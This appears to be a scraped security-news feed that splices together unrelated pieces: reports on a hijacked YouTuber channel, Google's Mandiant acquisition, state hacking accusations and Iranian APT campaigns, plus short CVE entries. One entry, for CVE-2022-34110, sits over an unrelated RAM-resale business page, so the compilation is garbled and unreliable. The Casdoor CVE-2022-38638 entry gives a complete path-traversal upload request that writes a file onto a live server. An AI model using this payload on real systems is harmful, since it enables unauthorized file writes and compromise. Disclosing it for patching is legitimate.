By Waqas
Scuba Jake, whose real name is Jake Koehler, had his YouTube channel "DALLMYD" with 13 million subscribers hacked to steal 1.01 BTC.
This is a post from HackRead.com Read the original post: Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

YouTube is frequently targeted in hacks especially to carry out **crypto scams**. The severity of crypto scams on YouTube can be quantified by the fact that in July 2020, Apple co-founder **Steve Wozniak ended up suing** Google and YouTube over Bitcoin giveaway scams being carried out in his name.

Now, another viral YouTuber Jake Koehler (aka Scuba Jake) has suffered a similar hack in which his channel “**DALLMYD**” was compromised to run a crypto scam and steal funds from his subscribers.

It is worth noting that Jake’s channel has more than 13 million subscribers and boasts 1.75 billion views since its creation in 2011. The American YouTuber is known for uploading scuba-diving videos where he goes underwater on treasure hunts and finds/returns lost items including smartphones, gadgets, and jewelry.

Archive video of Scuba Jake’s YouTube channel

According to the financial news and crypto analysis blog **Finbold**, the hacking occurred on September 9th, 2022. Reportedly, crypto scammers hijacked the channel and tried to defraud innocent followers of Scuba Jake in a **fake giveaway scheme** involving cryptocurrencies Bitcoin and Ethereum.

What’s worse, apparently scammers managed to steal 1.01 BTC (around $21,000). This analysis was based on the QR codes scammers shared with users to scan before sending crypto.

On the other hand, a look at Blockchain.com confirms that the **scammers’ Bitcoin wallet** shared with users received four transactions, and since its creation, it has received around 1.0107 BTC. That’s the same amount the scammers stole from Jake’s subscribers, but it may be higher because the scammers might have used multiple wallets during the live stream. It is worth noting that no transaction was made in the **Ethereum** wallet.

Scammers also changed Jake’s channel name to MicroStrategy US to replicate the firm MicroStrategy, a USA’s crypto-friendly business intelligence firm. Scammers hosted two live streams of an old video showcasing ex-CEO of the company and Bitcoin enthusiast Michael Saylor.

The scammers deceived unsuspecting subscribers of Jake into sending cryptocurrency and receiving a prize or higher reward from Saylor. They targeted the channel because of Jake’s massive following.

Although Jake has already confirmed the hack on his Instagram story but at the time of writing his channel was unavailable to viewers. A search for his YouTube channel shows video collaboration with other YouTubers while his channel is nowhere to be found on YouTube.

1.  **Botnet found using YouTube to illegally mine cryptocurrency**
2.  **Popular YouTube gaming channel hacked to run crypto scam**
3.  **YouTube deletes 2 million channels and 51 million videos over scams**
4.  **YouTube scammers impersonated Elon Musk, SpaceX; stole $150k in BTC**
5.  **British Military’s Twitter and YouTube Accounts Hacked to Scam Crypto Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

Your chance to be a part of a ground-breaking study.

The European Agency for Cybersecurity (ENISA) each October promotes cybersecurity among EU citizens and organizations, and is partnering with Anima People, specialists in behavioral science related to security, in a critical project to evaluate cybersecurity awareness campaigns in behavior change among employees. Organizations worldwide will benefit by the intelligence they need to design successful campaigns in the future, helping to drive long-term behavior conducive to a cyber-secure world. Please participate by completing this survey: https://ec.europa.eu/eusurvey/runner/Cybersecurity\_Awareness\_ECSM-PreC

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cybersecurity Awareness Campaigns: How Effective Are They in Changing Behavior?

The threat-intelligence and cyberdefense company company will join Google Cloud and retain its brand name.

**MOUNTAIN VIEW, Calif., and RESTON, Va., Sept. 12, 2022 /PRNewswire/** — Google LLC today announced the completion of its acquisition of Mandiant Inc. (NASDAQ: MNDT), a recognized leader in dynamic cyberdefense, threat intelligence and incident-response services. Mandiant will join Google Cloud and retain the Mandiant brand.

Google and Mandiant share a long commitment to industry-leading security. Over the past two decades, Google has innovated to build some of the most secure computing systems in the world. Google Cloud customers and partners benefit from these pioneering security capabilities, including world-class threat intelligence, zero trust architecture, and planet-scale analytics for security operations. Mandiant, which is known for delivering unparalleled frontline expertise and industry-leading threat intelligence, is a proven first responder to the world's largest cybersecurity incidents. Mandiant's services, delivered by their team of security and intelligence individuals spread across 22 countries, are widely recognized for helping top enterprises and organizations prepare for and react to cybersecurity incidents.

With this acquisition, Google Cloud and Mandiant will deliver an end-to-end security operations suite with even greater capabilities to support customers across their cloud and on-premise environments.

"The completion of this acquisition will enable us to deliver a comprehensive and best-in-class cybersecurity solution," said Thomas Kurian, CEO of Google Cloud. "We believe this acquisition creates incredible value for our customers and the security industry at large. Together, Google Cloud and Mandiant will help reinvent how organizations protect themselves, as well as detect and respond to threats."

Organizations today are facing cybersecurity challenges that have accelerated in frequency, severity and diversity, creating a global security imperative. Enterprises need to be able to detect and respond to malicious actors quickly, with actionable threat intelligence to continually protect their organizations against new attacks.

"Mandiant is driven by a mission to make every organization secure from cyber threats and confident in their readiness," said Kevin Mandia, CEO, Mandiant. "Combining our 18 years of threat intelligence and incident response experience with Google Cloud's security expertise presents an incredible opportunity to deliver with the speed and scale that the security industry needs."

Hear from others on the impact of this acquisition:

*   "The power of stronger partnerships across the cybersecurity ecosystem is critical to driving value for clients and protecting industries around the globe. The combination of Google Cloud and Mandiant and their commitment to multi-cloud will further support increased collaboration, driving innovation across the cybersecurity industry and augmenting threat research capabilities. We look forward to working with them on this mission." — Paolo Dal Cin, Global Lead, Accenture Security
*   "Google's acquisition of Mandiant, a leader in threat intelligence, security advisory, consulting and incident response services will allow Google Cloud to deliver an end-to-end security operations suite with even greater capabilities and services to support customers in their security transformation across cloud and on-premise environments." — Craig Robinson, Research VP, Security Services, IDC
*   "Bringing together Mandiant and Google Cloud, two long-time cybersecurity leaders, will advance how companies identify and defend against threats. We look forward to the impact of this acquisition, both for the security industry and the protection of our customers." — Andy Schworer, Director, Cyber Defense Engineering, Uber

For more information, see the Google Cloud blog and Mandiant blog.

**About Google  
**Google's mission is to organize the world's information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become one of the most widely known companies in the world. Google is a subsidiary of Alphabet Inc.

**About Google Cloud  
**Google Cloud accelerates every organization's ability to digitally transform its business. We deliver enterprise-grade solutions that leverage Google's cutting-edge technology — all on the cleanest cloud in the industry. Customers in more than 200 countries and territories turn to Google Cloud as their trusted partner to enable growth and solve their most critical business problems.

**About Mandiant, Inc.  
**Since 2004, Mandiant has been a trusted partner to security-conscious organizations. Effective security is based on the right combination of expertise, intelligence, and adaptive technology, and the Mandiant Advantage SaaS platform scales decades of frontline experience and industry-leading threat intelligence to deliver a range of dynamic cyber defense solutions. Mandiant's approach helps organizations develop more effective and efficient cyber security programs and instills confidence in their readiness to defend against and respond to cyber threats.

**Forward-Looking Statements  
**This release includes forward-looking statements within the meaning of Section 27A of the Securities Act of 1933 and Section 21E of the Securities Exchange Act of 1934. These forward-looking statements involve certain risks and uncertainties that could cause actual results to differ materially from those indicated in such forward-looking statements, including but not limited to the ability of Google to successfully integrate Mandiant's operations, product lines and technology; the ability of Google to implement its plans, forecasts and other expectations with respect to Mandiant's business after the completion of the transaction and realize additional opportunities for growth and innovation; and the other risks and important factors contained and identified in Alphabet's filings with the Securities and Exchange Commission, any of which could cause actual results to differ materially from the forward-looking statements. The forward-looking statements included in this release are made only as of the date hereof. Google and Alphabet undertake no obligation to update the forward-looking statements to reflect subsequent events or circumstances.

SOURCE: Google Inc.

Google Completes Acquisition of Mandiant

China has accused the U.S. National Security Agency (NSA) of conducting a string of cyberattacks aimed at aeronautical and military research-oriented Northwestern Polytechnical University in the city of Xi'an in June 2022.
The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week, and accused the Office of Tailored Access Operations (TAO) at the USA's

China has accused the U.S. National Security Agency (NSA) of conducting a string of cyberattacks aimed at aeronautical and military research-oriented Northwestern Polytechnical University in the city of Xi'an in June 2022.

The National Computer Virus Emergency Response Centre (NCVERC) disclosed its findings last week, and accused the Office of Tailored Access Operations (TAO) at the USA's National Security Agency (NSA) of orchestrating thousands of attacks against the entities located within the country.

"The U.S. NSA's TAO has carried out tens of thousands of malicious cyber attacks on China's domestic network targets, controlled tens of thousands of network devices (network servers, Internet terminals, network switches, telephone exchanges, routers, firewalls, etc.), and stole more than 140GB of high-value data," the NCVERC said.

The agency further said that the attack on the Northwestern Polytechnical University employed no fewer than 40 different cyber weapons that are designed to siphon passwords, network equipment configuration, network management data, and operation and maintenance data.

It also said that the TAO used two zero-day exploits for the SunOS Unix-based operating system to breach servers used in educational institutions and commercial companies to install what it called the OPEN Trojan.

The attacks are said to have been mounted via a network of proxy servers hosted in Japan, South Korea, Sweden, Poland, and Ukraine to relay the instructions to the compromised machines, with the agency noting that the NSA made use of an unnamed registrar company to anonymize the traceable information such as relevant domain names, certificates, and registrants.

Besides OPEN Trojan, the attacks entailed the use of malware it calls "Fury Spray," "Cunning heretics," "Stoic Surgeon," and "Acid Fox" that are capable of "covert and lasting control" and exfiltrating sensitive information.

"The U.S.'s behavior poses a serious danger to China's national security and citizens' personal information security," spokeswoman Mao Ning said last week.

"As the country that possesses the most powerful cyber technologies and capabilities, the U.S. should immediately stop using its prowess as an advantage to conduct theft and attacks against other countries, responsibly participate in global cyberspace governance and play a constructive role in defending cyber security."

This is not the first time China has called out the U.S. for its intelligence hacking operations. In February, Pangu Lab disclosed details of a previously unknown backdoor called Bvp47 that's alleged to have been used by the Equation Group to strike more than 287 entities globally.

Then in April, the NCVERC also released a technical analysis of a malware platform called Hive that's said to be employed by the U.S. Central Intelligence Agency (CIA) to customize and adapt malicious programs to different operating systems, plant backdoor, and achieve remote access.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

China Accuses NSA's TAO Unit of Hacking its Military Research University

An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to download arbitrary files regardless of file type or size.

We buy ram memory of all major brands like Crucial, SanDisk, Kingston, Dell, Apple, HP and other major brands. Branded RAM gives you higher value. If your RAM memory still have sticker on that, then you are at luck, we can provide you better pricing. We accept DDR2 and DDR3 types of RAM Memory. We also accept RAM memory from old Mac computer and laptops. You can sell us RAM in bulk quantity as well. We are buying server RAM memory also. Just fill the form on bottom of this page and we will get back to you as soon as possible.

**Why you choose Microstar?**

*   We are eBay Power Seller.
*   We are in this industry more than 3 decades.
*   We pay you most of your RAM memory.
*   We buy RAM memory from computer, laptop and server of all types.
*   We process your payment fast.

**We accept DDR2 and DDR3 RAM Memory of following brands:**

Oracle-Sun Microsystems

Samsung

Dell

Crucial

Micron

IBM

Hynix

HP

Edge

Corsair

Cisco

All other brands

**Sell Hard Drives, Sell used hard drives for cash**

Convert your excess storage in to cash by selling your old hard disk drives. We buy old used or refurbished hard drives. We accept HDDs and SSDs from computer, laptop, server etc.

Mostly we buy all size 2.5” and 3.5” storage types of hard disk drives and solid state drives. We buy hard disk drives of all major brands like Samsung, GMBT, Western Digital, Dell, IBM, Seagate etc.

**Microstar**

9216 Lazy Lane, Tampa Florida 33614.  
Email: microstar@verizon.net  
Store hours are by appointment only.

**President**

Hello, I am Ray Margarit and I am the President of Microstar. I am probably at the office now. Please call me at: (813) 667-1000.

**Testing**

We have very efficient & strenuous testing methods. We are Department of Defense certified in removing data from hard drives.

We are ALWAYS looking to buy large quantities of used software, used CPU chips, used memory chips, used hard drives, used monitors, used cdroms, used memory ram, used printers, used motherboards, used sdram, used video cards, such brands like; Pentium, AMD, Seagate, Western Digital, Dell, IBM, HP, Intel and others, as well as other computer related items which companies could sell after upgrades. We actually buy and sell all used electronic equipment.

**We are an eBay PowerSeller, See for yourself**

The Microstar Ebay store offers top quality brands in Memory, CPUs, Hard Drives, and other computer components and peripherals. You can sell RAM, Memory, Hard Disks, Processors, Motherboards and other computer scraps in bulk as well. We sell very fast as we are eBay Power Seller.

**Seller Form. We Buy. Sell to us!**

Please type in a description of the items that you would like to sell and the total price for them. If we are interested, we will respond with an e-mail message.

CVE-2022-34110: Sell Memory, Sell RAM, Sell Hard Drives

A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.
Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (

A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.

Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (IRGC), not to mention shares partial overlaps with another cluster called APT35, which is also known as Charming Kitten, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda.

APT42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in Australia, Europe, the Middle East, and the U.S.

Intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the COVID-19 pandemic in March 2020, indicating the threat actor's ability to swiftly modify its campaigns in order to meet its operational priorities.

"APT42 uses highly targeted spear-phishing and social engineering techniques designed to build trust and rapport with their victims in order to access their personal or corporate email accounts or to install Android malware on their mobile devices," Mandiant said in a report.

The goal is to exploit the fraudulent trust relationships to steal credentials, enabling the threat actor to leverage the access to conduct follow-on compromises of corporate networks to gather sensitive data and use the breached accounts to phish additional victims.

Attack chains involve a mix of highly targeted spear-phishing messages aimed at individuals and organizations of strategic interest to Iran. They are also conceived with the intent to build trust with former government officials, journalists, policymakers, and the Iranian diaspora abroad in hopes of distributing malware.

Outside of using hacked email accounts associated with think tanks to target researchers and other academic organizations, APT42 is often known to impersonate journalists and other professionals to engage with the victims for several days or even weeks before sending a malicious link.

In one attack observed in May 2017, the group targeted members of an Iranian opposition group operating from Europe and North America with email messages that contained links to rogue Google Books pages, which redirected victims to sign-in pages designed to siphon credentials and two-factor authentication codes.

Surveillance operations involve the distribution of Android malware such as VINETHORN and PINEFLOWER via text messages that are capable of recording audio and phone calls, extracting multimedia content and SMSes, and tracking geolocations. A VINETHORN payload spotted between April and October 2021 masqueraded as a VPN app called SaferVPN.

"The use of Android malware to target individuals of interest to the Iranian government provides APT42 with a productive method of obtaining sensitive information on targets, including movement, contacts, and personal information," the researchers noted.

The group is also said to use a raft of lightweight Windows malware from time to time – a PowerShell toehold backdoor named TAMECAT, a VBA-based macro dropper dubbed TABBYCAT, and a reverse shell macro known as VBREVSHELL – to augment their credential harvesting and espionage activities.

APT42's links to APT35 stems from links to an uncategorized threat cluster tracked as UNC2448, which Microsoft (DEV-0270) and Secureworks (Cobalt Mirage) disclosed as a Phosphorus subgroup carrying out ransomware attacks for financial gain using BitLocker.

Mandiant's analysis further lends credence to Microsoft's findings that DEV-0270/UNC2448 is operated by a front company that uses two public aliases, namely Secnerd and Lifeweb, both of which are connected to Najee Technology Hooshmand.

That having said, it's suspected the two adversarial collectives, despite their affiliation with IRGC, originate from disparate missions based on differences in targeting patterns and the tactics employed.

A key point of distinction is that while APT35 is oriented towards long-term, resource-intensive operations targeting different industry verticals in the U.S. and the Middle East, APT42's activities focus on individuals and entities for "domestic politics, foreign policy, and regime stability purposes."

"The group has displayed its ability to rapidly alter its operational focus as Iran's priorities change over time with evolving domestic and geopolitical conditions," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents

Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Hackers Target Los Angeles School District With Ransomware

The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.
"Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector

The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.

"Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors," the Treasury said.

The agency also accused Iranian state-sponsored actors of staging disruptive attacks aimed at Albanian government computer systems in mid-July 2022, forcing it to suspend its online services.

The development comes months nearly nine months after the U.S. Cyber Command characterized the advanced persistent threat (APT) known as MuddyWater as a subordinate element within MOIS. It also comes almost two years following the Treasury's sanctions against another Iranian APT group dubbed APT39 (aka Chafer or Radio Serpens).

Friday's sanctions effectively prohibit U.S. businesses and citizens from engaging in transactions with MOIS and Khatib, and non-U.S. citizens that engage in transactions with the designated entities may themselves be exposed to sanctions.

Coinciding with the economic blockade, the Albanian government said the cyberattack on the digital infrastructure was "orchestrated and sponsored by the Islamic Republic of Iran through the engagement of four groups that enacted the aggression."

Microsoft, which investigated the attacks, said the adversaries worked in tandem to carry out distinct phases of the attacks, with each cluster responsible for a different aspect of the operation -

*   DEV-0842 deployed the ransomware and wiper malware
*   DEV-0861 gained initial access and exfiltrated data
*   DEV-0166 (aka IntrudingDivisor) exfiltrated data, and
*   DEV-0133 (aka Lyceum or Siamese Kitten) probed victim infrastructure

The tech giant's threat intelligence teams also attributed the groups involved in gaining initial access and exfiltrating data to the Iranian MOIS-linked hacking collective codenamed Europium, which is also known as APT34, Cobalt Gypsy, Helix Kitten, or OilRig.

"The attackers responsible for the intrusion and exfiltration of data used tools previously used by other known Iranian attackers," it said in a technical deepdive. "The attackers responsible for the intrusion and exfiltration of data targeted other sectors and countries that are consistent with Iranian interests."

"The Iranian sponsored attempt at destruction had less than a 10% total impact on the customer environment," the company noted, adding the post-exploitation actions involved the use of web shells for persistence, unknown executables for reconnaissance, credential harvesting techniques, and defense evasion methods to turn off security products.

Microsoft's findings dovetail with previous analysis from Google's Mandiant, which called the politically motivated activity a "geographic expansion of Iranian disruptive cyber operations."

Initial access to the network of an Albanian government victim is said to have occurred as early as May 2021 via successful exploitation of a SharePoint remote code execution flaw (CVE-2019-0604), followed by exfiltration of email from the compromised network between October 2021 and January 2022.

A second, parallel wave of email harvesting was observed between November 2021 and May 2022, likely through a tool called Jason. On top of that, the intrusions entailed the deployment of ransomware called ROADSWEEP, eventually leading to the distribution of a wiper malware referred to as ZeroCleare.

Microsoft characterized the destructive campaign as a "form of direct and proportional retaliation" for a string of cyberattacks on Iran, including one staged by an Iranian hacktivist group that's affiliated to Mujahedin-e-Khalq (MEK) in the first week of July 2022.

The MEK, also known as the People's Mujahedin Organization of Iran (PMOI), is an Iranian dissident group largely based in Albania that seeks to overthrow the government of the Islamic Republic of Iran and install its own government.

"Some of the Albanian organizations targeted in the destructive attack were the equivalent organizations and government agencies in Iran that experienced prior cyberattacks with MEK-related messaging," the Windows maker said.

Iran's Foreign Ministry, however, has rejected accusations that the country was behind the digital offensive on Albania, calling them "baseless" and that it's "part of responsible international efforts to deal with the threat of cyberattacks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

An issue was discovered in Active Intelligent Visualization 5. The Vdc header is used in a SQL query without being sanitized. This causes SQL injection.

**We would highly appreciate your valuable feedback to continuously improve our product and services.**

Tag

#intel